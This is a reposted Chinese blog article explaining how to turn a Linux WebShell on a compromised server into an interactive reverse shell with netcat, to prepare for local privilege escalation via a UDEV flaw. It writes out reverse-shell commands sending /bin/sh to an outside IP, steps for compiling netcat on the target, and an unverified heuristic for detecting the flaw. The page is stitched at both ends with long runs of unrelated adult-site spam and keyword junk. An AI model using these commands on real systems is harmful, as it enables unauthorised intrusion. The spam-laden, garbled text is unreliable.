国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

Linux下通過WebShell反彈CmdLine Shell小技巧

安全 網(wǎng)站安全
(昨天又不小心搜到篇自己以前寫的文章,轉(zhuǎn)了很多地方,沒見一個寫版權(quán)的)昨晚(應該是今天凌晨)玩了半天朋友給的Linux的WebShell,本來想實踐一下UDEV提權(quán)呢,最后發(fā)現(xiàn)服務器貌似已經(jīng)打過補丁了。不過還是有其他的收獲的,所以我就YY下Linux反彈shell的問題。
(昨天又不小心搜到篇自己以前寫的文章,轉(zhuǎn)了很多地方,沒見一個寫版權(quán)的)

昨晚(應該是今天凌晨)玩了半天朋友給的Linux的WebShell,本來想實踐一下UDEV提權(quán)呢,最后發(fā)現(xiàn)服務器貌似已經(jīng)打過補丁了。
不過還是有其他的收獲的,所以我就YY下Linux反彈shell的問題。

Linux提權(quán)絕大部分都靠的是Local Exploit。WebShell一般都可以執(zhí)行命令,但是我們的EXP必須在可交互環(huán)境運行,否則如果直接在WebShell執(zhí)行,即使能提權(quán)成功,我們也沒法利用到。所以我們需要先反彈一個CmdLine Shell回來(直接說成CmdShell怕人誤解...因為Win有個cmd.exe ^_^),然后在命令行終端下執(zhí)行EXP進行提權(quán)。

一般情況下,絕大多數(shù)人都會通過PHP WebShell的Back Connect功能彈回一個Shell,但是有時候會碰到服務器不支持PHP或者WebShell沒法反彈的情況,比如這兩天朋友給我的一個JSPShell所在服務器只支持JSP,不支持PHP。這時候,我們經(jīng)典的netcat就可以派上用場了。

平時在Windows下做事的時候,在必要的情況下我們可以先在本機運行nc -vv -lp 1234監(jiān)聽端口,然后在肉雞上nc 12.21.12.21 1234 -e cmd.exe給我們反彈一個CmdShell,這個方法在Linux仍然可行。

在本機監(jiān)聽后,在WebShell運行nc 12.21.12.21 1234 -e /bin/sh就能彈一個CmdLine Shell給我們。
但我們經(jīng)常碰到的情況并不都是這么100%順利的,像昨晚整的那兩臺,每臺都是不能直接執(zhí)行nc的。一臺有nc,但執(zhí)行從是不起作用,另外一臺直接壓根就沒有nc....

不過,這個難不倒我們,我們可以給他裝一個嘛,比較快捷的方法是,我們可以到http://netcat.sourceforge.net/download.php下載nc的源碼,先在我們自己linux機器上編譯好以后把bin文件傳上去(我開始傳的我的Debian自帶的netcat,結(jié)果仍然不能運行....)。如果還不行,那就把源碼傳上去,在目標機器上直接編譯。

昨晚那兩臺機器,一臺我是直接傳的本地編譯后的,一臺是在目標機器上編譯的。如果直接傳的nc可以運行的話還比較好說,如果需要在目標機器上編譯的話,這里有點小技巧:
因為在得到CmdLine Shell前,我們只能在WebShell里執(zhí)行命令,一般每次只能執(zhí)行一條,然后等回顯。假如我們的WebShell在/var/www/site目錄,那么我們每次執(zhí)行命令默認的當前路徑都是/var/www/site,而我們的netcat源碼包解壓在了/tmp/netcatsrc文件夾,這樣的話,我們編譯netcat的時候,configure還好說,可用/tmp/netcatsrc/configure命令,但下一步make的時候就不行了,因為當前路徑是/var/www/site,而不是我們想要的/tmp/netcatsrc/,所以我們configure完了make的時候會報錯。

解決這個問題其實也很簡單,可以直接把兩句寫成一句就可以:cd /tmp/netcatsrc;make
用分號隔開寫,把make跟在目錄切換命令后面,這樣編譯的時候就不會報錯了。(流浪貓教的..^_^)
在還沒有得到CmdLine Shell的時候,這樣的寫法還是很有用的。

編譯成功以后,我們就可以輸入命令反彈Shell了(比如我這里nc路徑是/tmp/nc):
本地nc -vv -lp 80后
/tmp/nc 202.xx.xx.250 80 -e /bin/sh就可以給我嗎彈回來一個CmdLine Shell。

效果如下圖:


----------------

要注意反彈的Linux Shell是沒有$提示符的哦,執(zhí)行一句返回一句。
還有一點就是這里反彈Shell的時候我運行的是/bin/sh,當然運行/bin/bash也可以。
不過我覺得最好還是運行/bin/sh吧,因為/bin/sh的權(quán)限比/bin/bash放的更開一些

順便說一下怎么判斷目標是否有UDEV這個漏洞。
Linux我還不知道怎么樣查看它是否打過這個補丁,所以我想了個比較簡單的辦法:

1.執(zhí)行cat /proc/net/netlink,記錄下PID A
2.執(zhí)行ps aux | grep udev ,記下root的PID B
3.如果A = B - 1,則存在漏洞,否則不存在
這是我自己想的,因為獲得PID的時候有這兩種方法,所以我通過他們對比來判斷,但我并不能確定我這方法是100%正確的,僅供參考。
效果如下圖:
在反彈的Shell里執(zhí)行,發(fā)現(xiàn)得到的PID不一樣,2487 != 1230

在我自己機器上,PID一樣,1184=1185-1


責任編輯:Oo小孩兒 來源: 零魂's Blog
相關(guān)推薦

2009-08-07 10:18:13

Linux反彈CmdLine S技巧

2010-11-02 21:17:17

2018-06-18 10:33:39

Linux內(nèi)網(wǎng)技巧

2015-03-06 15:43:39

2019-12-04 12:28:24

TOP命令Linux

2017-09-04 16:20:38

Linuxshell命令

2020-03-18 14:20:25

shellLinux命令

2021-12-16 10:53:23

shell命令腳本

2011-02-25 14:10:52

Proftpd技巧

2009-10-23 08:41:14

Linux系統(tǒng)操作系統(tǒng)Grub

2010-09-26 16:46:05

2013-12-02 09:49:59

2022-11-29 10:42:46

GoFrame技巧腳手架

2011-05-27 10:02:42

Shell

2015-03-09 10:22:23

2021-06-07 23:51:16

MacGo服務

2009-07-15 09:09:45

Vim編輯器使用Vim備份

2009-06-19 13:32:40

Java開啟OpenGL

2013-11-15 14:23:28

Ubuntu技巧

2013-11-11 17:31:34

Ubuntu技巧
點贊
收藏

51CTO技術(shù)棧公眾號

国产日韩综合av| 水蜜桃亚洲精品| caoporm免费视频在线| 久久综合资源网| 青青成人在线| 99久久精品费精品国产| 91国在线观看| 国产精品美女999| 国产成人av电影在线观看| 校园春色欧美| 亚洲欧美在线免费观看| 亚洲同志男男gay1069网站| 国产一区二区三区直播精品电影 | 轻轻色免费在线视频| 日韩电影免费一区| 337p亚洲精品色噜噜狠狠| 麻豆亚洲一区| 欧美美女啪啪| 国产一区二区三区18| 国产调教视频在线观看| 欧美日韩精品欧美日韩精品| 不卡一二三区| 精品一区二区男人吃奶| 精品日韩99亚洲| 高h视频在线观看| 麻豆精品视频在线观看免费| 欧美激情国产精品| 秋霞影院一区二区| 亚洲电影有码| 欧美日韩国产亚洲沙发| 成人两性免费视频| 亚洲综合色丁香婷婷六月图片| 国模精品一区二区| www.99精品| 视频一区二区三区在线看免费看| 经典三级久久| 日韩女优制服丝袜电影| 国产精品中文字幕欧美| 亚洲精品美女久久7777777| 91精品蜜臀在线一区尤物| 欧美国产一级| 99视频在线视频| 色美美综合视频| 伊人久久大香伊蕉在人线观看热v 伊人久久大香线蕉综合影院首页 伊人久久大香 | 成人系列视频| 成人免费在线播放视频| 色综合网色综合| 91青青在线视频| 日韩成人av网| 亚洲精品国模| 91视频成人免费| 亚洲一区二区三区精品在线| 成人影院www在线观看| 天天综合网 天天综合色| 精品久久久久久无码中文野结衣| 国内成人精品2018免费看| 久久99久久99精品蜜柚传媒| 日韩av在线看| 亚洲夜晚福利在线观看| 制服丝袜在线播放| 中文字幕久久亚洲| 久久夜色精品国产噜噜av小说| 国产欧美中文字幕| 久久天堂成人| 国产视频一区二区视频| 欧美在线影院一区二区| 黄色欧美视频| 国产精品久久久久免费| 成人av资源网站| 一级黄色在线| 日韩在线视频一区| sis001亚洲原创区| 午夜精品久久久99热福利| 福利一区在线| 久久久久久久久久av| 一区二区三区中文字幕电影 | 香蕉久久夜色| 国产农村妇女毛片精品久久麻豆 | 日本电影一区二区三区| 91蝌蚪porny| 91在线网址| 久久亚洲精品中文字幕冲田杏梨| 欧美日韩a区| 国产天堂在线播放| 宅男噜噜噜66一区二区66| 精品一区亚洲| www.日本在线播放| 精品日韩在线观看| 天天综合亚洲| 激情综合色综合啪啪开心| 国产精品午夜一区二区欲梦| 狠狠爱综合网| 最近中文字幕一区二区| 免费在线看黄色片| 日韩丝袜视频| 黄色a级片免费看| 欧美午夜电影在线播放| 亚洲黄页网站| 日韩精品 欧美| 欧美二区乱c少妇| 黄色影院在线播放| 欧美国产激情视频| 成人福利免费观看| 欧美日韩精品一区二区在线播放| 国产女人18水真多18精品一级做| 在线观看中文| 精品欧美aⅴ在线网站| 日韩av综合| 50度灰在线观看| 另类图片激情| 在线观看污视频| 久久国产色av| 制服丝袜中文字幕一区| 亚洲最新色图| 丰满大乳少妇在线观看网站| 国产免费一区二区三区香蕉精| 青青草国产精品亚洲专区无| 中国动漫在线观看完整版免费| 欧美日本黄视频| 成人永久免费视频| 理论片午夜视频在线观看| 91pron在线| 午夜精品影院在线观看| 国产精品2区| 欧美另类一区| 欧美日韩国产在线观看| 亚洲成av在线| 色中文字幕在线观看| 久久69精品久久久久久久电影好| 久久精品国产精品亚洲红杏| 免费在线稳定资源站| 欧美视频一区二区| 北条麻妃一区二区三区在线观看 | 久草在线中文888| 欧美三级日本三级少妇99| 婷婷色在线资源| 成人黄色免费在线观看| 99视频精品免费视频| 最近中文字幕mv第三季歌词| 茄子视频成人在线| 亚洲成人一二三| 91亚洲国产成人精品一区二区三| 青青草原在线亚洲| 国产精品视频二区三区| 国产欧美精品va在线观看| 欧美综合欧美视频| 亚洲综合国产| 综合精品久久| yw在线观看| 亚洲二区在线视频| 亚洲另类中文字| 国产精品女同一区二区三区| av福利精品导航| 久久久精品性| 精品一区久久久久久| 日本国产精品视频| 色偷偷久久人人79超碰人人澡| 成人网在线播放| 91免费观看视频| 中文视频一区| 成人福利一区| 成人黄色图片网站| 黄色视屏网站在线免费观看| 欧美日韩一区在线播放| 免费在线成人av| 精品视频999| 色综合久久综合| 欧美日韩在线综合| 精品国产网站在线观看| 国产一区二区三区丝袜| 久久成人国产精品| 91美女片黄在线观| 国产成人三级视频| 日本一二区视频| 黄色av免费在线| 91精品尤物| 亚洲国产精品一区制服丝袜| 国产一区二区精品久久91| 欧美捆绑视频| 欧美在线www| 午夜在线视频观看日韩17c| 欧美一区二区在线视频| 一区二区三区免费播放| 乱一区二区av| 国产伦精品一区二区三区视频黑人 | 在线色欧美三级视频| 国产在线视频资源| 综合欧美一区二区三区| 日本熟妇人妻xxxxx| 国产高清亚洲一区| 欧美高清性xxxxhd| 中文字幕一区二区三区欧美日韩| 欧美亚洲在线视频| 午夜免费性福利| 欧美日韩黑人| 精品久久久久久久久久| 波多野结衣作品集| 国产精品系列在线| 动漫黄在线观看| 欧美性大战xxxxx久久久|